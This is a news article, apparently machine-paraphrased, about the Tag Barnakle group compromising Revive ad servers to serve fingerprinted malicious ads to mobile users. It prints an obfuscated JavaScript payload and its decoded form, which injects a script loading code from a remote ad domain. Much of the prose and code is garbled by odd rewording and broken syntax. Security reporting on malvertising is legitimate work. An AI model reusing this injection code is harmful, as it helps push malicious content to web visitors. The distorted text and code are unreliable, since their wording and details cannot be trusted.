Millions of web surfers are targeted by a single malvertising group


Hackers compromised more than 120 ad servers in an ongoing campaign in the past year that displayed malicious advertisements on tens of millions, if not hundreds of millions of devices when visiting websites that are outwardly harmless.

Malvertising is the practice of serving ads to people who visit trusted websites. The ads have embedded JavaScript that secretly exploits software bugs or tries to trick visitors into installing an unsafe app, paying fraudulent computer support fees, or taking other harmful measures. Typically, behind this internet scourge, the scammers pose as buyers and pay ad delivery networks to display the malicious ads on individual websites.

Go to the carotid artery

Infiltrating the ad ecosystem as a legitimate buyer requires resources. For one, scammers have to invest time learning how the market works and then create an entity that has a trustworthy reputation. The approach also requires paying cash to buy space to serve the malicious ads. This is not the technique of a malvertising group that the security firm Confiant Tag Barnakle calls.

“Tag Barnakle, on the other hand, can bypass this initial hurdle completely by going straight to jugular – a mass compromise in ad serving infrastructure,” wrote trusted researcher Eliya Stein in a blog post published on Monday. “They probably also have an ROI [return on investment] That would dwarf their rivals as they don’t have to spend a dime running advertising campaigns. “

In the past year, Tag Barnakle infected more than 120 servers with Revive, an open source app for businesses that want to run their own ad server instead of relying on a third-party service. The number 120 is twice the number of infected Revive servers that Confiant found in the last year.

Once an ad server is compromised, Tag Barnakle downloads a malicious payload onto it. To avoid detection, the group uses client-side fingerprints to ensure that only a small number of the most attractive targets receive the malicious ads. The servers that provide a secondary payload to these targets also use cloaking techniques to ensure they fly under the radar as well.


Here is an overview:


When Confiant reported on Tag Barnakle last year, it found the group had infected around 60 Revive servers. The feat allowed the group to distribute ads across 360+ web properties. The ads published fake Adobe Flash updates that, when run, installed malware on desktop computers.

This time around, Tag Barnakle is aimed at both iPhone and Android users. Websites receiving an ad through a compromised server deliver heavily obfuscated JavaScript that determines whether a visitor is using an iPhone or Android device.

https: // galikos[.]com / ci.html? mAn8iynQtt = SW50ZWwgSqW5jPngyMEludGVsKFIpIElyaXMoVE0OIFBsdXMgR3J3cGhpY37gNjU1

In the event that visitors pass this and other fingerprint tests, they will receive a secondary payload that looks like this:

var _0x209b =[“charCodeAt”,”fromCharCode”,”atob”,”length”]; (Function (_0x58f22e, _0x209b77) {var _0x3a54d6 = function (_0x562d16) {while (–_ 0x562d16) {_ 0x58f22e[“push”](_0x58f22e[“shift”]());}}; _ 0x3a54d6 (++ _ 0x209b77);} (_ 0x209b, 0x1d9)); var _0x3a54 = function (_0x58f22e, _0x209b77) {_ 0x58f22e = _0x58f22e-0x3;[_0x58f22e]; return _0x3a54d6;}; Function pr7IbU3HZp6 (_0x2df7f1, _0x4ed28f) {var _0x40b1c0 =[], _0xfa98e6 = 0x0, _0x1d2d3f, _0x4daddb = “”; for (var _0xaefdd9 = 0x0; _0xaefdd9 <0x100; _0xaefdd9 ++) {_ 0x40b1c0[_0xaefdd9]= _0xaefdd9;} for (_0xaefdd9 = 0x0; _0xaefdd9 <0x100; _0xaefdd9 ++) {_ 0xfa98e6 = (_ 0xfa98e6 + _0x40b1c0[_0xaefdd9]+ _0x4ed28f["charCodeAt"](_0xaefdd9% _0x4ed28f[_0x3a54("0x2")]))% 0x100, _0x1d2d3f = _0x40b1c0[_0xaefdd9], _0x40b1c0[_0xaefdd9]= _0x40b1c0[_0xfa98e6], _0x40b1c0[_0xfa98e6]= _0x1d2d3f;} _ 0xaefdd9 = 0x0, _0xfa98e6 = 0x0; for (var _0x2bdf25 = 0x0; _0x2bdf25 <_0x2df7f1[_0x3a54("0x2")]; _0x2bdf25 ++) {_ 0xaefdd9 = (_ 0xaefdd9 + 0x1)% 0x100, _0xfa98e6 = (_ 0xfa98e6 + _0x40b1c0[_0xaefdd9])% 0x100, _0x1d2d3f = _0x40b1c0[_0xaefdd9], _0x40b1c0[_0xaefdd9]= _0x40b1c0[_0xfa98e6], _0x40b1c0[_0xfa98e6]= _0x1d2d3f, _0x4daddb + = string[_0x3a54("0x0")](_0x2df7f1[_0x3a54("0x3")](_0x2bdf25) ^ _ 0x40b1c0[(_0x40b1c0[_0xaefdd9]+ _0x40b1c0[_0xfa98e6])% 0x100]);} return _0x4daddb;} function fCp5tRneHK (_0x2deb18) {var _0x3d61b2 = ""; try {_0x3d61b2 = window[_0x3a54("0x1")](_0x2deb18);} catch (_0x4b0a86) {} return _0x3d61b2;}; var qIxFjKSY6BVD = ["Bm2CdEOGUagaqnegJWgXyDAnxs1BSQNre5yS6AKl2Hb2j0+gF6iL1n4VxdNf+D0/","DWuTZUTZO+sQsXe8Ng==","j6nfa3m","Y0d83rLB","Y0F69rbB65Ug6d9y","gYTeJruwFuW","n3j6Vw==","n2TyRkwJoyYulkipRrYr","dFCGtizS","yPnc","2vvPcUEpsBZhStE=","gfDZYmHUEBxRWrw4M"]; var aBdDGL0KZhomY5Zl = document[pr7IbU3HZp6(fCp5tRneHK(qIxFjKSY6BVD[1]), qIxFjKSY6BVD[2])](pr7IbU3HZp6 (fCp5tRneHK (qIxFjKSY6BVD)[3]), qIxFjKSY6BVD[5])); aBdDGL0KZhomY5Zl[pr7IbU3HZp6(fCp5tRneHK(qIxFjKSY6BVD[4]), qIxFjKSY6BVD[5])](pr7IbU3HZp6 (fCp5tRneHK (qIxFjKSY6BVD)[6]), qIxFjKSY6BVD[8]), pr7IbU3HZp6 (fCp5tRneHK (qIxFjKSY6BVD)[7]), qIxFjKSY6BVD[8])); aBdDGL0KZhomY5Zl[pr7IbU3HZp6(fCp5tRneHK(qIxFjKSY6BVD[4]), qIxFjKSY6BVD[5])](pr7IbU3HZp6 (fCp5tRneHK (qIxFjKSY6BVD)[9]), qIxFjKSY6BVD[11]), pr7IbU3HZp6 (fCp5tRneHK (qIxFjKSY6BVD)[0]), qIxFjKSY6BVD[2])); var bundle = document.body || document.documentElement; bundle[pr7IbU3HZp6(fCp5tRneHK(qIxFjKSY6BVD[10]), qIxFjKSY6BVD[11])](aBdDGL0KZhomY5Zl);

When decoding, the payload is:

var aBdDGL0KZhomY5Zl = document[“createElement”](“Script”); aBdDGL0KZhomY5Zl[“setAtrribute”](“Text / Javascript”); aBdDGL0KZhomY5Zl[“setAtrribute”](“src”, “https: // overgalladean[.]com / apu.php? zoneid = 2721667 “);

As the obfuscated code shows, the ads are served through Overgalladean[.]com, a domain that Confiant says is used by PropellerAds, an advertising network that security companies like Malwarebytes have long documented as malicious.

When Confiant researchers played the click tracker for propeller ads on the types of devices Tag Barnakle was targeting, they saw ads like this:


Served tens of millions

The ads mostly lure targets into an App Store list for fake security or VPN apps with hidden subscription costs or “traffic diverted for nefarious purposes”.

With ad servers, often integrated with multiple ad exchanges, the ads can spread to hundreds, possibly thousands, of individual websites. Confiant doesn’t know how many end users are exposed to the advertising, but the company believes the number is high.

“When we consider that some of these media companies have done this [Revive] By integrating with leading programmatic advertising platforms, Tag Barnakle’s reach is easily in the ten, if not hundreds, of millions of devices, ”Stein wrote. “This is a conservative estimate that takes into account the fact that they are placing cookies on their victims to detect the payload with low frequency, which is likely to slow the detection of their presence.”


Steven Gregory